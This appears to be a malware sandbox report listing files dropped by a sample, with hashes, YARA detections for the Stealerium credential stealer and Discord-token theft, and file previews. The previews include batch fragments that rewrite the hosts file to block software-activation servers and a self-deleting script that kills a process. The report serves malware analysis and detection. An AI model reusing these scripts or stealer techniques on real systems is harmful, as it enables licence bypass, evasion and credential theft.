                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\checkip[1].htm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):169
                                                                                                                                                                                                                                                          Entropy (8bit):4.51013352720184
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPbAdTwcWWGu:q43tISl6kXiMIWSU6XlI5LPepfGu
                                                                                                                                                                                                                                                          MD5:61DA15462A5DC94FE3E228F03D6D6F9E
                                                                                                                                                                                                                                                          SHA1:198371E24132816E094BA201DE343B3F087E83E9
                                                                                                                                                                                                                                                          SHA-256:74CBC7E9766E9B64D2352633ECE3ABB004CBFA6826CD999F9FEC142E7D294B2F
                                                                                                                                                                                                                                                          SHA-512:C63C80ECD7BE230741DC0474C7C7FE3F8DF5201320F96DED8AA12C2E0AC166A6EAE31561DF4C500E2027DCC5144B6D7691E7EBD6EF327224DEEE5DB5C090D2DB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.19.1</center>..</body>..</html>..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\checkip[1].htm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):169
                                                                                                                                                                                                                                                          Entropy (8bit):4.51013352720184
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPbAdTwcWWGu:q43tISl6kXiMIWSU6XlI5LPepfGu
                                                                                                                                                                                                                                                          MD5:61DA15462A5DC94FE3E228F03D6D6F9E
                                                                                                                                                                                                                                                          SHA1:198371E24132816E094BA201DE343B3F087E83E9
                                                                                                                                                                                                                                                          SHA-256:74CBC7E9766E9B64D2352633ECE3ABB004CBFA6826CD999F9FEC142E7D294B2F
                                                                                                                                                                                                                                                          SHA-512:C63C80ECD7BE230741DC0474C7C7FE3F8DF5201320F96DED8AA12C2E0AC166A6EAE31561DF4C500E2027DCC5144B6D7691E7EBD6EF327224DEEE5DB5C090D2DB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.19.1</center>..</body>..</html>..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\checkip[1].htm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (845)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1865
                                                                                                                                                                                                                                                          Entropy (8bit):5.186858751840116
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:nUSZlRZh7ZWPK2c9VUI0wZBJmb73I46bsJHN6Yn7DHL1RX0g9uoV:nUSZlRZdZEK2cjcb73zbL6Yn7LRks
                                                                                                                                                                                                                                                          MD5:0ABFFF5C8908F6469A29072D504D1E28
                                                                                                                                                                                                                                                          SHA1:3B81CF92575E381E575DDEAF3CC895480286A43F
                                                                                                                                                                                                                                                          SHA-256:C6E676F721EAD81D2AA39F3AD6BDC8E9C4C78CDDAB51912CF4348FAB9E87D586
                                                                                                                                                                                                                                                          SHA-512:421239DD73F471E385FC74A4AF27241DA9E481BAB7A984F5E6D28249FD49287539540FF84F954616F4CE68538CC935D1F1DB28B0B5F0AC1E3FAA74420F416F9B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" sizes="16x16" href="/img/favicon-16.png"><link rel="icon" sizes="32x32" href="/img/favicon-32.png"><link rel="icon" sizes="96x96" href="/img/favicon-96.png"><link rel="icon" sizes="196x196" href="/img/favicon-196.png"><title>Check your IP address in system anti fraud detections, detecting real location</title><meta name="Description" content="On our site you can find all the information you may obtain affordable ways of your IP address, system and location, as do systems for the detection of fraud. As you can see how safe you hide your real IP address"><script>(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};. m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}). (window, document,

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\AEAWHK.bat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5070
                                                                                                                                                                                                                                                          Entropy (8bit):5.272843360717248
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:vflVf/1VfYpVf/Q7VfaVfNVfMVfspVfs/VfsHVf7ZVfsVVfSMjF:vfDf/TfMf/kf8fLfmfsvfsNfs1fbfszL
                                                                                                                                                                                                                                                          MD5:12CA45D6A6BF7C0BED076701DF7875A7
                                                                                                                                                                                                                                                          SHA1:0C24440FBF3C13A3229C285D8F4E8C429F6AE784
                                                                                                                                                                                                                                                          SHA-256:ABED5C6D862517E96862DBFC75730229DD36497E06883167EC567E69B613671B
                                                                                                                                                                                                                                                          SHA-512:D4BB53AD27248F42BA3622FBD28BFE76EDA7DDEA4E64D30B8B77FE162619FA3405EC382AB9418A1B4C2276A4E04BB2EC0E72C5BEA9D0ED51BCA81AF0DCAE80D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:@ECHO OFF....ECHO @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@..ECHO @@@@ Intercambios Virtuales @@@@..ECHO @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@..ECHO...ECHO Comprobando permisos de administrador.....OPENFILES >NUL 2>&1..IF %ERRORLEVEL% EQU 0 (.....ECHO Permisos de administrador detectados....ECHO....ECHO Hosts file : %WINDIR%\system32\drivers\etc\hosts...ECHO......SETLOCAL ENABLEDELAYEDEXPANSION.. ....SET BLOCKLINE=127.0.0.1 platform.albumtd.com....ECHO Revisando : !BLOCKLINE!... FIND /C /I "!BLOCKLINE!" "%WINDIR%\system32\drivers\etc\hosts" >NUL 2>NUL... IF !ERRORLEVEL! NEQ 0 (... .ECHO Linea encontrada, agregandola al archivo hosts.... .ECHO !BLOCKLINE!>>%WINDIR%\system32\drivers\etc\hosts... ) ELSE (... .ECHO Linea encontrada.... )........SET BLOCKLINE=127.0.0.1 activation.albumtd.com....ECHO Revisando : !BLOCKLINE!... FIND /C /I "!BLOCKLINE!" "%WINDIR%\system32\drivers\etc\hosts" >NUL 2>NUL... IF !ERRORLEVEL! NEQ 0 (... .ECHO Linea encontrada, agregando

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\JOUNLV.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3747840
                                                                                                                                                                                                                                                          Entropy (8bit):7.975026284621191
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:4kqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:4kSIlLtzWAXAkuujCPX9YG9he5GnQCAo
                                                                                                                                                                                                                                                          MD5:8F39B25AF1B9048E0C7B06256C602B4F
                                                                                                                                                                                                                                                          SHA1:19D39D75643FDA4D84BBCE0E55F68797B04BAB9C
                                                                                                                                                                                                                                                          SHA-256:1E0B820A25BF178C2E20298EEFDC91E005354891D2A8C93BBCF1B1F39BB4C075
                                                                                                                                                                                                                                                          SHA-512:3F55F3CF65849459A9CF5D0CF404BEE26BF59302D627287DF5D8ED46DC41642B48C1AD53AAF53C2A194B6CC88DE800E4099D82468CCAA9DEB2AC1CEB9E0165EF
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: ditekSHen
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... ...............................@9.(...........................,89.............................................................. ..P............text...H.9.. ....9................. ..`.rsrc...(....@9.......9.............@..@........................................H.......pS7.........!....'..L%6..................................................(....*..0..........~....(}........~....(}........~....r...p(....,.*~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....*...0..........r...p.....r+..p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....s....%r...pr6..po....%r...pr6..po....%r...pr6..po................%.r8..p.%.rJ..p.%.rZ..p.%.rd..p.%.r

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\aut66E4.tmp

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3747840
                                                                                                                                                                                                                                                          Entropy (8bit):7.975026284621191
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:4kqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:4kSIlLtzWAXAkuujCPX9YG9he5GnQCAo
                                                                                                                                                                                                                                                          MD5:8F39B25AF1B9048E0C7B06256C602B4F
                                                                                                                                                                                                                                                          SHA1:19D39D75643FDA4D84BBCE0E55F68797B04BAB9C
                                                                                                                                                                                                                                                          SHA-256:1E0B820A25BF178C2E20298EEFDC91E005354891D2A8C93BBCF1B1F39BB4C075
                                                                                                                                                                                                                                                          SHA-512:3F55F3CF65849459A9CF5D0CF404BEE26BF59302D627287DF5D8ED46DC41642B48C1AD53AAF53C2A194B6CC88DE800E4099D82468CCAA9DEB2AC1CEB9E0165EF
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, Author: ditekSHen
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... ...............................@9.(...........................,89.............................................................. ..P............text...H.9.. ....9................. ..`.rsrc...(....@9.......9.............@..@........................................H.......pS7.........!....'..L%6..................................................(....*..0..........~....(}........~....(}........~....r...p(....,.*~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....~....r...p~....r...po....(}...o....*...0..........r...p.....r+..p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....s....%r...pr6..po....%r...pr6..po....%r...pr6..po................%.r8..p.%.rJ..p.%.rZ..p.%.rd..p.%.r

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\aut6965.tmp

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):778
                                                                                                                                                                                                                                                          Entropy (8bit):7.402840098306193
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:nBKxpIp32eLU4jh8Ml5h8QIwAvJpWTM9LDxszUHMRXaGyUGz24XbuHhoS0BgF:nKY74Ml8nJRt3ciMIG9AbECS0SF
                                                                                                                                                                                                                                                          MD5:B4B9EAC083FAA9144162551DFD4324A0
                                                                                                                                                                                                                                                          SHA1:48460201F52C6AFFAC680A883AE6AE8BDDB40964
                                                                                                                                                                                                                                                          SHA-256:26D7F405429C10035F3ED4DBFC2BD27C9833B8D6F1FCAE5F823212E32B552749
                                                                                                                                                                                                                                                          SHA-512:CAF7D4D9BC61B7FC0A07E31B76E877CEC2FD901C06EC6DBED18AABA745D4062C342A7831C6363D6E81E797AC6480BF1137C51B1702048D2C50DB413034DC0A82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:EA06....Qht.|..F.CaP.P.e@...... .H)6..c..lV.}.AV...[...s..... ........,......b.......r..n`... ..-..u..t.Xl....i..S..Zu..L.....uV. .O...l*.F.Ih.*.>.L....,..Q..&..@....`....X..t....e.\.[...H)..... .Zm.Y..A%..i.JMJK\..nwK-.g2.Y.V....s.Yn.:....@..QS..)..... ..4*e..E.Pk ..b.A.T.4.t6..f........TR.u.{1.M...."c .[,7K5..m.Xm.+...d.X......j.Yn...m:.H@..!. ........K.r.}&A"...A"....@+.....2..H@W.!.S.......@.X.Zm.[...n....+-.Y ...V[8.#l..,6....c.Zn....-..<..);>.... ...AE.T.....V. 2....a..-7k...o..........p...r.......m..e..i...\?......u..p....;...r...o?..0....a..m...@-.x"?.......m.KM..r... ......O..{m..m..M..i.Yn.0......c..m.@./.....r...N..<...v.#..-.@.,X..Y... .Xd.+-..i......-K..~.%..e...h.........a%...o.[.@..N...;M..s.YmV[...a.H...x...e.0$.;...p.H@.x...l*.A...

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):152
                                                                                                                                                                                                                                                          Entropy (8bit):5.4334293660082835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HFTulK1shFRovRK2STtv/K025Pt+kiE2J5xAIzDwDwcQ87DVAWyn:sgLvE2SZX2Pwkn23fzDwDwhkVwn
                                                                                                                                                                                                                                                          MD5:58B9088A6AB24E5E7221FCEAD9C062DE
                                                                                                                                                                                                                                                          SHA1:9A018ECC6C58B58800AF5EFAC9C799CE619F0232
                                                                                                                                                                                                                                                          SHA-256:DB45EB25A91A56580139799141CF16F18C1FDB30C63A663E7D2C5B441E770DB4
                                                                                                                                                                                                                                                          SHA-512:B0BFAE01C2AF44BF552E10A75FEEF0DC44840540DE56C14533A0D80A0F61CEAA9CFBD4BDD796F60863F226DEBBEE95A0C6EEEEDC77E4C6D46E3ECAE65D4EF4EA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:chcp 65001..taskkill /F /PID 4828..timeout /T 2 /NOBREAK > NUL..del /F /Q "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp1A59.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp2EEF.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp428C.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp429D.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp42BD.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp555.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpDCDB.tmp.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

